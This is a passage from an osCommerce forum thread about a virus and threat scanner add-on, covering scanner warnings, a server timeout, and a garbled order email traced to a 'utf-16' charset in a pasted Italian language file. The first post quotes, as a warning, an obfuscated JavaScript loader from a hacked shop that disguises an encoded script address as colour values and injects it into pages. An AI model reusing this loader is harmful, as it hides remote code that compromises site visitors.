Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

osCommerce VTS


Guest

Recommended Posts

Anther search string should be for fromCharCode (in all javascript) I had a site hacked some of inserted code was obfuscated very well. The imbeded javascript code looked like

  var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7a84', '#82837e', '#40403d', '#727e7c', '#3e7982', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00');
  var redef_colors = 1;
  var colors_picked = 0;

  function div_pick_colors(t,styled) {
var s = "";
for (j=0;j<t.length;j++) {
	var c_rgb = t[j];
	for (i=1;i<7;i++) {
		var c_clr = c_rgb.substr(i++,2);
		if (c_clr!="00") s += String.fromCharCode(parseInt(c_clr,16)-15);
	}
}
if (styled) {
	s = s.substr(0,36) + s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime() + s.substr((s.length-2));
} else {
	s = s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime();
}
return s;
  }

  function try_pick_colors() {
try {
   	if(!document.getElementById || !document.createElement){
		document.write(div_pick_colors(div_colors,1));
	   } else {
		var new_cstyle=document.createElement("script");
		new_cstyle.type="text/javascript";
		new_cstyle.src=div_pick_colors(div_colors,0);
		document.getElementsByTagName("head")[0].appendChild(new_cstyle);
	}
} catch(e) { }
try {
	check_colors_picked();
} catch(e) {
	setTimeout("try_pick_colors()", 500);
}
  }

 

Just a heads up.

<><

Link to comment
Share on other sites

  • 2 months later...

I installed latest VTS and ran it. It found "possibly" infected files and potential threats, mostly of the form:

 

Possible Infection: /usr/local/pem/vhosts/103373/webspace/httpdocs/[fake catalog]/includes/functions/general.php (Known automated hack <=> eval( ) on line: 506

or

Possible Infection: /usr/local/pem/vhosts/103373/webspace/httpdocs/[my catalog]/[my admin]/jquery/fancybox/jquery.fancybox-1.3.4.pack.js (Known automated hack <=> iframe) on line: 20

 

Are there any valid uses of eval() and iframe ? How do I know if it is or isn't infected?

 

File could be a potentional threat: /usr/local/pem/vhosts/103373/webspace/httpdocs/[my catalog]/cookie_usage.php (Known filename threat)

File could be a potentional threat: /usr/local/pem/vhosts/103373/webspace/httpdocs/[my catalog]/image.php (Known filename threat)

File could be a potentional threat: /usr/local/pem/vhosts/103373/webspace/httpdocs/[my catalog]/includes/languages/english/cookie_usage.php (Known filename threat)

File could be a potentional threat: /usr/local/pem/vhosts/103373/webspace/httpdocs/[my catalog]/ent/mail.php (Known filename threat)

File could be a potentional threat: /usr/local/pem/vhosts/103373/webspace/httpdocs/[my catalog]/ent/includes/languages/english/mail.php (Known filename threat)

 

 

and 1 shell exec warning in a non osc file:

 

Possible Infection: /usr/local/pem/vhosts/103373/webspace/httpdocs/contact/libs/php-captcha.inc.php (Known automated hack <=> shell_exec ) on line: 466

 

What should I be doing about this? Thank you for any assistance you can offer.

Link to comment
Share on other sites

These messages indicate that it is possible that there is malicious code in the files mentioned.

 

You need to go and look at the code in those files and see what it does and make an informed opinion.

 

It is not possible to tell if there is a problem without seeing the code.

 

HTH

 

G

Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.

Link to comment
Share on other sites

  • 3 months later...

I am using:

  1. osCommerce 2.3.1
  2. PHP 5.2
  3. Apache
  4. osCommerce Virus & Threat Scanner v1.0.12 (although the title of it when I downloaded it was osCommerce Virus & Threat Scanner v1.0.13

I installed as per the instructions (very straight forward). I go the the admin page and click on 'Virus & Threat Scan) and then on 'ocVTS'. In both FF and IE, the page churns away and then I get '500 Internal Server Error'. What could be causing this?

Link to comment
Share on other sites

  • 3 months later...
  • 3 weeks later...

Dear Sir,

Today my client has purchased an item from my site, the order confirmation email is written in strange characters, the remainder of the site works well. http://www.mognettibike.it/oscommerce/index.php

 

This copy of email:

潭湧瑥楴楢敫ⴊⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭഭ上牯楤瑴牵㩡栠瑴㩰潭湧瑥楴楢敫⽴獯潣浭牥散愯捣畯瑮桟獩潴祲楟普㽰牯敤彲摩㜽䐊瑡⁡牯楤㘱映扥牢楡〲㈱਍਍牐摯瑯楴਍ⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭ਍慖摵潢獲⁡慤洠湡扵楲‵楌牴潒摡ㄠ删獯慳⠠潒摡爱摥〬䔰剕਍ⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭ਍潔慴敬瀠牡楺污㩥㘠〰啅䘊牯慦瑩⥔›〱〬䔰剕潔慴敬〬䔰剕਍਍湉楤楲空潣獮来慮਍ⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭ਍湡散捳潍湧瑥楴⁡楆敲ല倊慡空汯畳汬伧汧潩㌰ശ䈊敲捳慩瑉污൹ഊ䤊摮物穩潺映瑡畴慲楺湯൥ⴊⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭ䘊慲据獥潣䴠杯敮瑴൩嘊慩䘠物湥敺慐穡潺潬猠汵杏楬㈠〵獥楣䤠慴祬਍਍敍潴潤搠慰慧敭瑮൯ⴊⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭഭ倊条浡湥潴愠汬潣獮来慮਍਍਍਍

 

Thank for help

Link to comment
Share on other sites

This is not really VTS related more an email problem.

 

Have you made a test purchase and if so what language are the emails in.

 

What languages should the site work in?

 

What character sets are defined in each language file?

 

HTH

 

G

Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.

Link to comment
Share on other sites

please someone help me with this error:

Fatal error: Maximum execution time of 30 seconds exceeded in /home2/jpreloje/public_html/adminlahia/AV/ocVTS.php on line 353

 

Check with your web host about your hosting environment

 

There are several variables that may affect some with large data files when using Easy Populate. These can usually be adjusted to fit your needs in a Linux/Apache environment by adding a php.ini file in your /admin/ folder. Do check with your host on this to ensure that a) it can be done, and B) you're staying within your Terms of Service. This forum post may help:

http://www.oscommerce.com/forums/index.php?showtopic=162244&st=5900&p=1101458entry1101458

 

When these factors come into play, often the script will simply halt with no error message.

 

The following php.ini settings are considered to be "default" by most hosts. Adjust higher as needed.

 

· max_execution_time = 30 ;(in seconds)

Change this to allow for more time that PHP can process your import file.

 

· max_input_time = 60 ;(in seconds)

post_max_size = 2M ;

upload_max_filesize = 2M ;

These will limit the size of a file you can import using Easy Populate. This can be circumvented by uploading the file via FTP to your /temp/ folder and importing it from there.

 

· memory_limit = 8M ;

Change this to allow PHP to use more memory to process your file. (32M recommended)

 

· session.gc_maxlifetime = 1440 ; (in seconds)

Your session lifetime, should always be longer then the max_execution_time.

 

HTH

 

G

Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.

Link to comment
Share on other sites

This is not really VTS related more an email problem.

 

Have you made a test purchase and if so what language are the emails in.

 

What languages should the site work in?

 

What character sets are defined in each language file?

 

HTH

 

G

Yes i have test purchasse and the email is:

潭湧瑥楴楢敫ⴊⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭഭ上牯楤瑴牵㩡栠瑴㩰潭湧瑥楴楢敫⽴獯潣浭牥散愯捣畯瑮桟獩潴祲楟普㽰牯敤彲摩㜽䐊瑡⁡牯楤㘱映扥牢楡〲㈱਍਍牐摯瑯楴਍ⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭ਍䅒义䕌升䜠䅉䱌䅔䱇䅉䴠⠠業⤮⠠慒敪䴭〬䔰剕਍ⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭ਍潔慴敬瀠牡楺污㩥〰啅䘊牯慦瑩⥔›〱〬䔰剕潔慴敬〬䔰剕਍਍湉楤楲空潣獮来慮਍ⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭ਍湡散捳潍湧瑥楴⁡楆敲ല倊慡空汯畳汬伧汧潩㌰ശ䈊敲捳慩瑉污൹ഊ䤊摮物穩潺映瑡畴慲楺湯൥ⴊⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭ䘊慲据獥潣䴠杯敮瑴൩嘊慩䘠物湥敺慐穡潺潬猠汵杏楬㈠〵獥楣䤠慴祬਍਍敍潴潤搠慰慧敭瑮൯ⴊⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭഭ倊条浡湥潴愠汬潣獮来慮਍਍਍਍

潭湧瑥楴楢敫ⴊⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭഭ上牯楤瑴牵㩡栠瑴㩰潭湧瑥楴楢敫⽴獯潣浭牥散愯捣畯瑮桟獩潴祲楟普㽰牯敤彲摩㜽䐊瑡⁡牯楤㘱映扥牢楡〲㈱਍਍牐摯瑯楴਍ⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭ਍䅒义䕌升䜠䅉䱌䅔䱇䅉䴠⠠業⤮⠠慒敪䴭〬䔰剕਍ⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭ਍潔慴敬瀠牡楺污㩥〰啅䘊牯慦瑩⥔›〱〬䔰剕潔慴敬〬䔰剕਍਍湉楤楲空潣獮来慮਍ⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭ਍湡散捳潍湧瑥楴⁡楆敲ല倊慡空汯畳汬伧汧潩㌰ശ䈊敲捳慩瑉污൹ഊ䤊摮物穩潺映瑡畴慲楺湯൥ⴊⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭ䘊慲据獥潣䴠杯敮瑴൩嘊慩䘠物湥敺慐穡潺潬猠汵杏楬㈠〵獥楣䤠慴祬਍਍敍潴潤搠慰慧敭瑮൯ⴊⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭഭ倊条浡湥潴愠汬潣獮来慮਍਍਍਍

 

 

The language in the site is Italian and English,

Link to comment
Share on other sites

 

What character sets are defined in each language file?

 

Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.

Link to comment
Share on other sites

If you send an emails from the shop admin do you have the same problem?

 

G

Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.

Link to comment
Share on other sites

Excuse me for this problem, this is set caratter in the php file

<?php

/*

$Id: italian.php,v 1.106 2003/06/20 00:18:31 hpdl Exp $

 

osCommerce, Open Source E-Commerce Solutions

http://www.oscommerce.com

 

Copyright © 2002 osCommerce

 

Released under the GNU General Public License

*/

 

// look in your $PATH_LOCALE/locale directory for available locales..

// on RedHat6.0 I used 'en_US'

// on FreeBSD 4.0 I use 'en_US.ISO_8859-1'

// this may not work under win32 environments..

setlocale(LC_TIME, 'it_IT.ISO8859-1');

define('DATE_FORMAT_SHORT', '%d/%m/%Y'); // this is used for strftime()

define('DATE_FORMAT_LONG', '%a %d %B, %Y'); // this is used for strftime()

define('DATE_FORMAT', 'd/m/Y'); // this is used for date()

define('PHP_DATE_TIME_FORMAT', 'd/m/Y H:i:s'); // this is used for date()

define('DATE_TIME_FORMAT', DATE_FORMAT_SHORT . ' %H:%M:%S');

define('JQUERY_DATEPICKER_I18N_CODE', ''); // leave empty for en_US; see http://jqueryui.com/demos/datepicker/#localization

define('JQUERY_DATEPICKER_FORMAT', 'mm/dd/yy'); // see http://docs.jquery.com/UI/Datepicker/formatDate

 

////

// Return date in raw format

// $date should be in format mm/dd/yyyy

// raw date is in format YYYYMMDD, or DDMMYYYY

function tep_date_raw($date, $reverse = false) {

if ($reverse) {

return substr($date, 0, 2) . substr($date, 3, 2) . substr($date, 6, 4);

} else {

return substr($date, 6, 4) . substr($date, 3, 2) . substr($date, 0, 2);

}

}

 

// Global entries for the <html> tag

define('HTML_PARAMS','dir="ltr" lang="it"');

 

// charset for web pages and emails

define('CHARSET', 'utf-16');

 

// page title

define('TITLE', 'osCommerce');

 

// header text in includes/header.php

define('HEADER_TITLE_TOP', 'Amministrazione');

define('HEADER_TITLE_SUPPORT_SITE', 'Sito di supporto');

define('HEADER_TITLE_ONLINE_CATALOG', 'Catalogo On-line');

define('HEADER_TITLE_ADMINISTRATION', 'Amministrazione');

 

// text for gender

define('MALE', 'Uomo');

define('FEMALE', 'Donna');

 

// text for date of birth example

define('DOB_FORMAT_STRING', 'dd/mm/yyyy');

 

// configuration box text in includes/boxes/configuration.php

define('BOX_HEADING_CONFIGURATION', 'Configurazione');

define('BOX_CONFIGURATION_MYSTORE', 'Il mio negozio');

define('BOX_CONFIGURATION_LOGGING', 'Logging');

define('BOX_CONFIGURATION_CACHE', 'Cache');

define('BOX_CONFIGURATION_ADMINISTRATORS', 'Amministratori');

define('BOX_CONFIGURATION_STORE_LOGO', 'Logo Negozio');

 

// modules box text in includes/boxes/modules.php

define('BOX_HEADING_MODULES', 'Moduli');

define('BOX_MODULES_PAYMENT', 'Pagamenti');

define('BOX_MODULES_SHIPPING', 'Spedizioni');

define('BOX_MODULES_ORDER_TOTAL', 'Totale Ordine');

 

// categories box text in includes/boxes/catalog.php

define('BOX_HEADING_CATALOG', 'Catalogo');

define('BOX_CATALOG_CATEGORIES_PRODUCTS', 'Categorie/Prodotti');

define('BOX_CATALOG_CATEGORIES_PRODUCTS_ATTRIBUTES', 'Attributi Prodotti');

define('BOX_CATALOG_MANUFACTURERS', 'Produttori');

define('BOX_CATALOG_REVIEWS', 'Recensioni');

define('BOX_CATALOG_SPECIALS', 'Offerte');

define('BOX_CATALOG_PRODUCTS_EXPECTED', 'Prodotti in arrivo');

 

// customers box text in includes/boxes/customers.php

define('BOX_HEADING_CUSTOMERS', 'Clienti');

define('BOX_CUSTOMERS_CUSTOMERS', 'Clienti');

define('BOX_CUSTOMERS_ORDERS', 'Ordini');

 

// taxes box text in includes/boxes/taxes.php

define('BOX_HEADING_LOCATION_AND_TAXES', 'Zone/Tasse');

define('BOX_TAXES_COUNTRIES', 'Nazioni');

define('BOX_TAXES_ZONES', 'Stati/Province');

define('BOX_TAXES_GEO_ZONES', 'Tasse stat./prov.');

define('BOX_TAXES_TAX_CLASSES', 'Tipi di Tasse');

define('BOX_TAXES_TAX_RATES', 'Aliquota Tasse');

 

// reports box text in includes/boxes/reports.php

define('BOX_HEADING_REPORTS', 'Statistiche');

define('BOX_REPORTS_PRODUCTS_VIEWED', 'Prodotti visti');

define('BOX_REPORTS_PRODUCTS_PURCHASED', 'Prodotti acquistati');

define('BOX_REPORTS_ORDERS_TOTAL', 'Totale Ordini Clienti');

 

// tools text in includes/boxes/tools.php

define('BOX_HEADING_TOOLS', 'Strumenti utili');

define('BOX_TOOLS_BACKUP', 'Salva Database');

define('BOX_TOOLS_ACTION_RECORDER', 'Registra Azioni');

define('BOX_TOOLS_BANNER_MANAGER', 'Gestione Banner');

define('BOX_TOOLS_CACHE', 'Controllo Cache');

define('BOX_TOOLS_DEFINE_LANGUAGE', 'Definizione lingua');

define('BOX_TOOLS_FILE_MANAGER', 'Gestione File');

define('BOX_TOOLS_MAIL', 'Invio Email');

define('BOX_TOOLS_NEWSLETTER_MANAGER', 'Gestione Newsletter');

define('BOX_TOOLS_SEC_DIR_PERMISSIONS', 'Cartella dei Permessi di Sicurezza');

define('BOX_TOOLS_SERVER_INFO', 'Informazioni Server');

define('BOX_TOOLS_WHOS_ONLINE', 'Chi c\'è online');

define('BOX_TOOLS_VERSION_CHECK', 'Update per OSC');

 

// localizaion box text in includes/boxes/localization.php

define('BOX_HEADING_LOCALIZATION', 'Localizzazione');

define('BOX_LOCALIZATION_CURRENCIES', 'Valute/Monete');

define('BOX_LOCALIZATION_LANGUAGES', 'Lingue');

define('BOX_LOCALIZATION_ORDERS_STATUS', 'Stato Ordini');

 

// javascript messages

define('JS_ERROR', 'Si sono verificati degli errori nel procedimento di compilazione del tuo modulo!!\nEseguire le seguenti correzioni:\n\n');

 

define('JS_OPTIONS_VALUE_PRICE', '* Definire per il nuovo attributo del Prodotto un prezzo\n');

define('JS_OPTIONS_VALUE_PRICE_PREFIX', '* Definire per il nuovo attributo del Prodotto un prefisso di prezzo\n');

 

define('JS_PRODUCTS_NAME', '* Definire per il nuovo Prodotto un nome\n');

define('JS_PRODUCTS_DESCRIPTION', '* Definire per il nuovo Prodotto una descrizione\n');

define('JS_PRODUCTS_PRICE', '* Definire per il nuovo Prodotto necessita di un prezzo\n');

define('JS_PRODUCTS_WEIGHT', '* Definire per il nuovo Prodotto un peso\n');

define('JS_PRODUCTS_QUANTITY', '* Definire per il nuovo Prodotto una quantità\n');

define('JS_PRODUCTS_MODEL', '* Definire per il nuovo Prodotto un modello\n');

define('JS_PRODUCTS_IMAGE', '* Definire per il nuovo Prodotto un\'immagine\'\n');

 

define('JS_SPECIALS_PRODUCTS_PRICE', '* Definire un nuovo prezzo per questo prodotto.\n');

 

define('JS_GENDER', '* La scelta del Sesso è obbligatoria.\n');

define('JS_FIRST_NAME', '* Il Nome deve contenere almeno ' . ENTRY_FIRST_NAME_MIN_LENGTH . ' caratteri.\n');

define('JS_LAST_NAME', '* Il Cognome deve contenere almeno ' . ENTRY_LAST_NAME_MIN_LENGTH . ' caratteri.\n');

define('JS_DOB', '* La Data di Nascita deve avere il formato: xx/xx/xxxx (mese/giorno/anno).\n');

define('JS_EMAIL_ADDRESS', '* L\'indirizzo di E-mail deve contenere almeno\' ' . ENTRY_EMAIL_ADDRESS_MIN_LENGTH . ' caratteri.\n');

define('JS_ADDRESS', '* L\'indirizzo deve contenere almeno\' ' . ENTRY_STREET_ADDRESS_MIN_LENGTH . ' caratteri.\n');

define('JS_POST_CODE', '* Il CAP deve contenere almeno ' . ENTRY_POSTCODE_MIN_LENGTH . ' caratteri.\n');

define('JS_CITY', '* Il nome della Città deve contenere almeno ' . ENTRY_CITY_MIN_LENGTH . ' caratteri.\n');

define('JS_STATE', '* Lo Stato/Provincia deve essere selezionato.\n');

define('JS_STATE_SELECT', '-- Seleziona Sotto --');

define('JS_ZONE', '* Lo Stato/Provincia deve essere scelto dalla lista.');

define('JS_COUNTRY', '* Lo Stato/Provincia deve essere scelto.\n');

define('JS_TELEPHONE', '* Il Numero di Telefono deve contenere almeno ' . ENTRY_TELEPHONE_MIN_LENGTH . ' caratteri.\n');

define('JS_PASSWORD', '* La Password e la Conferma devono contenere almeno ' . ENTRY_PASSWORD_MIN_LENGTH . ' caratteri.\n');

 

define('JS_ORDER_DOES_NOT_EXIST', 'Il Numero dell\'Ordine\' %s non esiste!');

 

define('CATEGORY_PERSONAL', 'Personale');

define('CATEGORY_ADDRESS', 'Indirizzo');

define('CATEGORY_CONTACT', 'Contatti');

define('CATEGORY_COMPANY', 'Azienda');

define('CATEGORY_OPTIONS', 'Opzioni');

 

define('ENTRY_GENDER', 'Sesso:');

define('ENTRY_GENDER_ERROR', ' <span class="errorText">campo richiesto</span>');

define('ENTRY_FIRST_NAME', 'Nome:');

define('ENTRY_FIRST_NAME_ERROR', ' <span class="errorText">minimo ' . ENTRY_FIRST_NAME_MIN_LENGTH . ' caratteri</span>');

define('ENTRY_LAST_NAME', 'Cognome:');

define('ENTRY_LAST_NAME_ERROR', ' <span class="errorText">minimo ' . ENTRY_LAST_NAME_MIN_LENGTH . ' caratteri</span>');

define('ENTRY_DATE_OF_BIRTH', 'Data di Nascita:');

define('ENTRY_DATE_OF_BIRTH_ERROR', ' <span class="errorText">(eg. 21/05/1970)</span>');

define('ENTRY_EMAIL_ADDRESS', 'Indirizzo E-Mail:');

define('ENTRY_EMAIL_ADDRESS_ERROR', ' <span class="errorText">minimo ' . ENTRY_EMAIL_ADDRESS_MIN_LENGTH . ' caratteri</span>');

define('ENTRY_EMAIL_ADDRESS_CHECK_ERROR', ' <span class="errorText">L\'inidirizzo email non sembra essere valido!</span>');

define('ENTRY_EMAIL_ADDRESS_ERROR_EXISTS', ' <span class="errorText">Questo indirizzo email esiste già!</span>');

define('ENTRY_COMPANY', 'Nome Azienda:');

define('ENTRY_COMPANY_ERROR', '');

define('ENTRY_STREET_ADDRESS', 'Indirizzo:');

define('ENTRY_STREET_ADDRESS_ERROR', ' <span class="errorText">minimo ' . ENTRY_STREET_ADDRESS_MIN_LENGTH . ' caratteri</span>');

define('ENTRY_SUBURB', 'Frazione:');

define('ENTRY_SUBURB_ERROR', '');

define('ENTRY_POST_CODE', 'CAP:');

define('ENTRY_POST_CODE_ERROR', ' <span class="errorText">minimo ' . ENTRY_POSTCODE_MIN_LENGTH . ' caratteri</span>');

define('ENTRY_CITY', 'Città:');

define('ENTRY_CITY_ERROR', ' <span class="errorText">minimo ' . ENTRY_CITY_MIN_LENGTH . ' caratteri</span>');

define('ENTRY_STATE', 'Stato/Provincia:');

define('ENTRY_STATE_ERROR', ' <span class="errorText">richiesto</span>');

define('ENTRY_COUNTRY', 'Nazione:');

define('ENTRY_COUNTRY_ERROR', '');

define('ENTRY_TELEPHONE_NUMBER', 'Numero di telefono:');

define('ENTRY_TELEPHONE_NUMBER_ERROR', ' <span class="errorText">minimo ' . ENTRY_TELEPHONE_MIN_LENGTH . ' caratteri</span>');

define('ENTRY_FAX_NUMBER', 'Numero di Fax:');

define('ENTRY_FAX_NUMBER_ERROR', '');

define('ENTRY_NEWSLETTER', 'Newsletter:');

define('ENTRY_NEWSLETTER_YES', 'Mi iscrivo');

define('ENTRY_NEWSLETTER_NO', 'Non mi iscrivo');

define('ENTRY_NEWSLETTER_ERROR', '');

 

//PIVACF start

define('ENTRY_PIVA', 'Partita Iva:');

define('ENTRY_CF', 'Codice Fiscale:');

define('JS_PIVA', 'Parita Iva richiesta');

define('JS_CF', 'Codice Fiscale richiesto');

//PIVACF end

 

// images

define('IMAGE_ANI_SEND_EMAIL', 'Spedisci E-Mail');

define('IMAGE_BACK', 'Indietro');

define('IMAGE_BACKUP', 'Salva');

define('IMAGE_CANCEL', 'Cancella');

define('IMAGE_CONFIRM', 'Conferma');

define('IMAGE_COPY', 'Copia');

define('IMAGE_COPY_TO', 'Copia In');

define('IMAGE_DETAILS', 'Dettagli');

define('IMAGE_DELETE', 'Cancella');

define('IMAGE_EDIT', 'Modifica');

define('IMAGE_EMAIL', 'Email');

define('IMAGE_EXPORT', 'Esporta');

define('IMAGE_FILE_MANAGER', 'File Manager');

define('IMAGE_ICON_STATUS_GREEN', 'Attiva');

define('IMAGE_ICON_STATUS_GREEN_LIGHT', 'Imposta come Attivo');

define('IMAGE_ICON_STATUS_RED', 'Inattiva');

define('IMAGE_ICON_STATUS_RED_LIGHT', 'Imposta come Inattivo');

define('IMAGE_ICON_INFO', 'Informazioni');

define('IMAGE_INSERT', 'Inserisci');

define('IMAGE_LOCK', 'Blocca');

define('IMAGE_MODULE_INSTALL', 'Installa Modulo');

define('IMAGE_MODULE_REMOVE', 'Rimuovi Modulo');

define('IMAGE_MOVE', 'Sposta');

define('IMAGE_NEW_BANNER', 'Nuovo Banner');

define('IMAGE_NEW_CATEGORY', 'Nuova Categoria');

define('IMAGE_NEW_COUNTRY', 'Nuova Nazione');

define('IMAGE_NEW_CURRENCY', 'Nuova Valuta');

define('IMAGE_NEW_FILE', 'Nuovo File');

define('IMAGE_NEW_FOLDER', 'Nuova Cartella');

define('IMAGE_NEW_LANGUAGE', 'Nuova Lingua');

define('IMAGE_NEW_NEWSLETTER', 'Nuova Newsletter');

define('IMAGE_NEW_PRODUCT', 'Nuovo Prodotto');

define('IMAGE_NEW_TAX_CLASS', 'Nuovo Tipo di Tassa');

define('IMAGE_NEW_TAX_RATE', 'Nuova Aliquota Tassa');

define('IMAGE_NEW_TAX_ZONE', 'Nuova Tassa Stat./Prov.');

define('IMAGE_NEW_ZONE', 'Nuovo Stato/Provincia');

define('IMAGE_ORDERS', 'Ordini');

define('IMAGE_ORDERS_INVOICE', 'Fattura');

define('IMAGE_ORDERS_PACKINGSLIP', 'Ordini evasi');

define('IMAGE_PREVIEW', 'Anteprima');

define('IMAGE_RESTORE', 'Ripristina');

define('IMAGE_RESET', 'Resetta');

define('IMAGE_SAVE', 'Salva');

define('IMAGE_SEARCH', 'Cerca');

define('IMAGE_SELECT', 'Seleziona');

define('IMAGE_SEND', 'Spedisci');

define('IMAGE_SEND_EMAIL', 'Invia Email');

define('IMAGE_UNLOCK', 'Sblocca');

define('IMAGE_UPDATE', 'Aggiorna');

define('IMAGE_UPDATE_CURRENCIES', 'Aggiorna Tasso di Cambio');

define('IMAGE_UPLOAD', 'Upload??');

 

define('ICON_CROSS', 'Falso');

define('ICON_CURRENT_FOLDER', 'Cartella Corrente');

define('ICON_DELETE', 'Cancella');

define('ICON_ERROR', 'Errore');

define('ICON_FILE', 'File');

define('ICON_FILE_DOWNLOAD', 'Download');

define('ICON_FOLDER', 'Cartella');

define('ICON_LOCKED', 'Bloccato');

define('ICON_PREVIOUS_LEVEL', 'Livello Precedente');

define('ICON_PREVIEW', 'Anteprima');

define('ICON_STATISTICS', 'Statistiche');

define('ICON_SUCCESS', 'Riuscito');

define('ICON_TICK', 'Vero');

define('ICON_UNLOCKED', 'Sbloccato');

define('ICON_WARNING', 'Attenzione');

 

// constants for use in tep_prev_next_display function

define('TEXT_RESULT_PAGE', 'Pagina %s di %d');

define('TEXT_DISPLAY_NUMBER_OF_BANNERS', 'Visualizzati <b>%d</b> su <b>%d</b> (di <b>%d</b> banners)');

define('TEXT_DISPLAY_NUMBER_OF_COUNTRIES', 'Visualizzate <b>%d</b> su <b>%d</b> (di <b>%d</b> nazioni)');

define('TEXT_DISPLAY_NUMBER_OF_CUSTOMERS', 'Visualizzati <b>%d</b> su <b>%d</b> (di <b>%d</b> clienti)');

define('TEXT_DISPLAY_NUMBER_OF_CURRENCIES', 'Visualizzate <b>%d</b> su <b>%d</b> (di <b>%d</b> valute)');

define('TEXT_DISPLAY_NUMBER_OF_ENTRIES', 'Visualizzati <strong>%d</strong> di <strong>%d</strong> (of <strong>%d</strong> entries)');

define('TEXT_DISPLAY_NUMBER_OF_LANGUAGES', 'Visualizzate <b>%d</b> su <b>%d</b> (di <b>%d</b> lingue)');

define('TEXT_DISPLAY_NUMBER_OF_MANUFACTURERS', 'Visualizzati <b>%d</b> su <b>%d</b> (di <b>%d</b> produttori)');

define('TEXT_DISPLAY_NUMBER_OF_NEWSLETTERS', 'Visualizzate <b>%d</b> su <b>%d</b> (di <b>%d</b> newsletters)');

define('TEXT_DISPLAY_NUMBER_OF_ORDERS', 'Visualizzati <b>%d</b> su <b>%d</b> (di <b>%d</b> ordini)');

define('TEXT_DISPLAY_NUMBER_OF_ORDERS_STATUS', 'Visualizzati <b>%d</b> su <b>%d</b> (di <b>%d</b> stato ordini)');

define('TEXT_DISPLAY_NUMBER_OF_PRODUCTS', 'Visualizzati <b>%d</b> su <b>%d</b> (di <b>%d</b> prodotti)');

define('TEXT_DISPLAY_NUMBER_OF_PRODUCTS_EXPECTED', 'Visualizzati <b>%d</b> su <b>%d</b> (di <b>%d</b> prodotti in attesa)');

define('TEXT_DISPLAY_NUMBER_OF_REVIEWS', 'Visualizzati <b>%d</b> su <b>%d</b> (di <b>%d</b> recensioni prodotto)');

